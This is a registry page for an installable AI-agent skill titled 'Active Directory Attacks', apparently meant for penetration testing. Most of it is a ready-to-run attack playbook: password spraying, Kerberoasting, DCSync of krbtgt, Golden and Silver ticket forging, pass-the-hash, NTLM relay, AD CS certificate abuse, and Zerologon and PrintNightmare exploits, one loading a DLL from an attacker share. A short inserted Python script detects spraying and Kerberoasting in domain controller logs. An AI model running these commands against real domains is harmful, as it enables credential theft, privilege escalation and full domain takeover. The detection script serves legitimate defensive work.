active directory attacks

📁 aleister1102/skills 📅 9 days ago
Install command
npx skills add https://github.com/aleister1102/skills --skill active-directory-attacks


Skill documentation

Active Directory Attacks

Scope & Authorization

Use this skill only within authorized red-team or penetration-testing engagements targeting Active Directory domains; the documented sequences are not for defensive exercises, general Windows troubleshooting, or unauthorized testing. Follow engagement boundaries, avoid causing persistence beyond the scope, and do not execute these steps on non-AD systems.

Overview

Red-team operators combine reconnaissance, credential harvesting, Kerberos abuse, and lateral movement tooling to dominate Windows domains once they gain a foothold.

Inputs & Prerequisites

  • Kali Linux, Windows attack platform, or similar toolset
  • Domain user credentials with network access to a Domain Controller
  • Tools such as Impacket, Mimikatz, BloodHound, Rubeus, CrackMapExec, PowerView, Responder
  • Synchronize your system clock with the domain (±5 minutes) before launching Kerberos attacks

Outputs/Deliverables

  • Domain enumeration data (users, groups, services, attack paths)
  • Extracted credentials, hashes, and Kerberos tickets
  • Elevated impersonation (Golden/Silver Ticket, delegated credentials)
  • Persistent, documented access paths (local admin, service accounts, scheduled tasks)

Essential Tools

Tool          Purpose
BloodHound    Attack-path visualization
Impacket      Python-based AD exploitation scripts
Mimikatz      Credential extraction and ticket forging
Rubeus        Kerberos ticket manipulation
CrackMapExec  Network enumeration and exploitation
PowerView     Domain enumeration via PowerShell
Responder     LLMNR/NBT-NS poisoning and relays

Core Workflow

This section tracks the high-level steps: clock sync, reconnaissance, credential attacks, Kerberos abuse, and relays.

Step 1: Kerberos Clock Sync

# Detect clock skew
nmap -sT 10.10.10.10 -p445 --script smb2-time

# Fix clock on Linux
sudo date -s "14 APR 2024 18:25:16"

# Fix clock on Windows
net time /domain /set

# Fake clock without changing system time
faketime -f '+8h' <command>

Step 2: AD Reconnaissance

# BloodHound / Neo4j
neo4j console
bloodhound --no-sandbox
# Collect with SharpHound
.\SharpHound.exe -c All
.\SharpHound.exe -c All --ldapusername user --ldappassword pass

# Python collector
bloodhound-python -u 'user' -p 'password' -d domain.local -ns 10.10.10.10 -c all

# PowerView
Get-NetDomain
Get-DomainSID
Get-NetDomainController
Get-NetUser
Get-NetUser -SamAccountName targetuser
Get-UserProperty -Properties pwdlastset
Get-NetGroupMember -GroupName "Domain Admins"
Get-DomainGroup -Identity "Domain Admins" | Select-Object -ExpandProperty Member
Find-LocalAdminAccess -Verbose
Invoke-UserHunter
Invoke-UserHunter -Stealth

Credential & Ticket Attacks

Focus on password spraying, Kerberoasting, AS-REP roasting, DCSync, and Kerberos ticket forging. The detailed commands, cracking steps, and ticket uses are documented below.

Password Spraying

./kerbrute passwordspray -d domain.local --dc 10.10.10.10 users.txt Password123
crackmapexec smb 10.10.10.10 -u users.txt -p 'Password123' --continue-on-success

Kerberoasting

GetUserSPNs.py domain.local/user:password -dc-ip 10.10.10.10 -request -outputfile hashes.txt
.\Rubeus.exe kerberoast /outfile:hashes.txt
crackmapexec ldap 10.10.10.10 -u user -p password --kerberoast output.txt
hashcat -m 13100 hashes.txt rockyou.txt
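As an added example from the defender's side (not part of the skill), the following script shows what the password-spraying and Kerberoasting commands above leave behind in Domain Controller security logs: a burst of 4771 pre-authentication failures across many accounts from one source, and 4769 service-ticket requests with RC4 (0x17) for several non-machine SPNs by one user. The log lines are constructed for the example in a simplified key=value form, and the thresholds are assumptions to tune per environment.

```python
"""Added detection example (not from the skill): finds the traces that password
spraying (4771 pre-auth failures) and Kerberoasting (4769 RC4 TGS requests) leave
in Domain Controller logs. Log lines are constructed, in a simplified key=value form."""
from collections import defaultdict

# Constructed sample: 10.10.10.50 fails pre-auth for four accounts (spray),
# lowpriv pulls RC4 tickets for three non-machine SPNs (Kerberoast).
SAMPLE_LOG = """\
EventID=4771 TargetUserName=alice IpAddress=10.10.10.50 Status=0x18
EventID=4771 TargetUserName=bob IpAddress=10.10.10.50 Status=0x18
EventID=4771 TargetUserName=carol IpAddress=10.10.10.50 Status=0x18
EventID=4771 TargetUserName=dave IpAddress=10.10.10.50 Status=0x18
EventID=4771 TargetUserName=alice IpAddress=10.10.10.51 Status=0x18
EventID=4769 TargetUserName=lowpriv@DOMAIN.LOCAL ServiceName=svc_sql IpAddress=10.10.10.60 TicketEncryptionType=0x17
EventID=4769 TargetUserName=lowpriv@DOMAIN.LOCAL ServiceName=svc_web IpAddress=10.10.10.60 TicketEncryptionType=0x17
EventID=4769 TargetUserName=lowpriv@DOMAIN.LOCAL ServiceName=svc_backup IpAddress=10.10.10.60 TicketEncryptionType=0x17
EventID=4769 TargetUserName=lowpriv@DOMAIN.LOCAL ServiceName=WS01$ IpAddress=10.10.10.60 TicketEncryptionType=0x17
EventID=4769 TargetUserName=jdoe@DOMAIN.LOCAL ServiceName=svc_sql IpAddress=10.10.10.70 TicketEncryptionType=0x12
"""

def parse(log):
    """Turn each non-empty line into a dict of its key=value fields."""
    return [dict(kv.split("=", 1) for kv in line.split())
            for line in log.splitlines() if line.strip()]

def spray_sources(events, threshold=4):
    """Source IPs whose pre-auth failures with status 0x18 (KDC_ERR_PREAUTH_FAILED,
    i.e. wrong password) span at least `threshold` distinct accounts."""
    users = defaultdict(set)
    for e in events:
        if e["EventID"] == "4771" and e.get("Status") == "0x18":
            users[e["IpAddress"]].add(e["TargetUserName"])
    return {ip: sorted(u) for ip, u in users.items() if len(u) >= threshold}

def kerberoast_requesters(events, threshold=3):
    """Accounts requesting RC4-HMAC (0x17) service tickets for several distinct
    non-machine SPNs; roasting tools typically request RC4 so the hash cracks
    faster, while normal domain clients negotiate AES (0x11/0x12)."""
    spns = defaultdict(set)
    for e in events:
        if (e["EventID"] == "4769" and e.get("TicketEncryptionType") == "0x17"
                and not e["ServiceName"].endswith("$")):
            spns[e["TargetUserName"]].add(e["ServiceName"])
    return {u: sorted(s) for u, s in spns.items() if len(s) >= threshold}

if __name__ == "__main__":
    events = parse(SAMPLE_LOG)
    print("spray sources:", spray_sources(events))
    print("kerberoast requesters:", kerberoast_requesters(events))
```

Pairing the 4769 rule with an AES-only or gMSA policy for service accounts removes most of the benign RC4 noise and makes a crackable ticket far less useful.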

AS-REP Roasting

GetNPUsers.py domain.local/ -usersfile users.txt -dc-ip 10.10.10.10 -format hashcat
.\Rubeus.exe asreproast /format:hashcat /outfile:hashes.txt
hashcat -m 18200 hashes.txt rockyou.txt

DCSync

secretsdump.py domain.local/admin:password@10.10.10.10 -just-dc-user krbtgt
lsadump::dcsync /domain:domain.local /user:krbtgt
lsadump::dcsync /domain:domain.local /user:Administrator

Kerberos Ticket Attacks

# Golden Ticket
kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-xxx /krbtgt:HASH /id:500 /ptt
# Impacket ticketer
ticketer.py -nthash KRBTGT_HASH -domain-sid S-1-5-21-xxx -domain domain.local Administrator
export KRB5CCNAME=Administrator.ccache
psexec.py -k -no-pass domain.local/Administrator@dc.domain.local
# Silver Ticket
kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-xxx /target:server.domain.local /service:cifs /rc4:SERVICE_HASH /ptt
# Pass-the-Hash
psexec.py domain.local/Administrator@10.10.10.10 -hashes :NTHASH
wmiexec.py domain.local/Administrator@10.10.10.10 -hashes :NTHASH
smbexec.py domain.local/Administrator@10.10.10.10 -hashes :NTHASH
crackmapexec smb 10.10.10.10 -u Administrator -H NTHASH -d domain.local
crackmapexec smb 10.10.10.10 -u Administrator -H NTHASH --local-auth
# OverPass-the-Hash
getTGT.py domain.local/user -hashes :NTHASH
export KRB5CCNAME=user.ccache
.\Rubeus.exe asktgt /user:user /rc4:NTHASH /ptt

NTLM Relay & Certificate Attacks

Relay victims, escalate privileges, and abuse certificate services with the following tooling.

responder -I eth0 -wrf
ntlmrelayx.py -tf targets.txt -smb2support
ntlmrelayx.py -t ldaps://dc.domain.local -wh attacker-wpad --delegate-access
crackmapexec smb 10.10.10.0/24 --gen-relay-list targets.txt
# AD CS ESC1
certipy find -u user@domain.local -p password -dc-ip 10.10.10.10
certipy req -u user@domain.local -p password -ca CA-NAME -target dc.domain.local -template VulnTemplate -upn administrator@domain.local
certipy auth -pfx administrator.pfx -dc-ip 10.10.10.10
# AD CS ESC8
ntlmrelayx.py -t http://ca.domain.local/certsrv/certfnsh.asp -smb2support --adcs --template DomainController

Advanced Topics (see references/advanced-attacks.md)

For delegation attacks, GPO abuse, RODC exploitation, SCCM/WSUS deployments, ADCS nuances, trust relationships, ADFS Golden SAML, credential sources, and Linux AD integration, load references/advanced-attacks.md.

Critical CVEs

crackmapexec smb 10.10.10.10 -u '' -p '' -M zerologon
python3 cve-2020-1472-exploit.py DC01 10.10.10.10
secretsdump.py -just-dc domain.local/DC01$@10.10.10.10 -no-pass
python3 restorepassword.py domain.local/DC01@DC01 -target-ip 10.10.10.10 -hexpass HEXPASSWORD
rpcdump.py @10.10.10.10 | grep 'MS-RPRN'
python3 CVE-2021-1675.py domain.local/user:pass@10.10.10.10 '\\attacker\share\evil.dll'
python3 sam_the_admin.py "domain.local/user:password" -dc-ip 10.10.10.10 -shell

Quick Reference

Attack          Tool         Command
Kerberoast      Impacket     GetUserSPNs.py domain/user:pass -request
AS-REP Roast    Impacket     GetNPUsers.py domain/ -usersfile users.txt
DCSync          secretsdump  secretsdump.py domain/admin:pass@DC
Pass-the-Hash   psexec       psexec.py domain/user@target -hashes :HASH
Golden Ticket   Mimikatz     kerberos::golden /user:Admin /krbtgt:HASH
Spray           kerbrute     kerbrute passwordspray -d domain users.txt Pass

Constraints

  • Must: Sync time with the DC before Kerberos attacks, use valid domain credentials, and document every compromised account.
  • Must Not: Lock out accounts via aggressive spraying, alter production AD objects without approval, or leave forged tickets undocumented.
  • Should: Run BloodHound for path discovery, verify SMB signing before relays, and confirm patch levels before exploiting CVEs.

Examples

Example 1: Domain Compromise via Kerberoasting

GetUserSPNs.py domain.local/lowpriv:password -dc-ip 10.10.10.10
GetUserSPNs.py domain.local/lowpriv:password -dc-ip 10.10.10.10 -request -outputfile tgs.txt
hashcat -m 13100 tgs.txt rockyou.txt
psexec.py domain.local/svc_admin:CrackedPassword@10.10.10.10

Example 2: NTLM Relay to LDAP

ntlmrelayx.py -t ldaps://dc.domain.local --delegate-access
python3 printerbug.py domain.local/user:pass@target 10.10.10.12
# Use created machine account for RBCD attack

Troubleshooting

Issue                        Solution
Clock skew too great         Sync time with the DC or use faketime
Kerberoasting returns empty  No service accounts with SPNs
DCSync access denied         Need Replicating Directory Changes rights
NTLM relay fails             Check SMB signing; target LDAP if possible
BloodHound empty             Ensure SharpHound ran with correct creds

Additional Resources

Load references/advanced-attacks.md when you need deeper guidance for delegation, GPO abuse, RODC/ADCS exploitation, trust relationships, ADFS Golden SAML, credential sources, or Linux AD integration.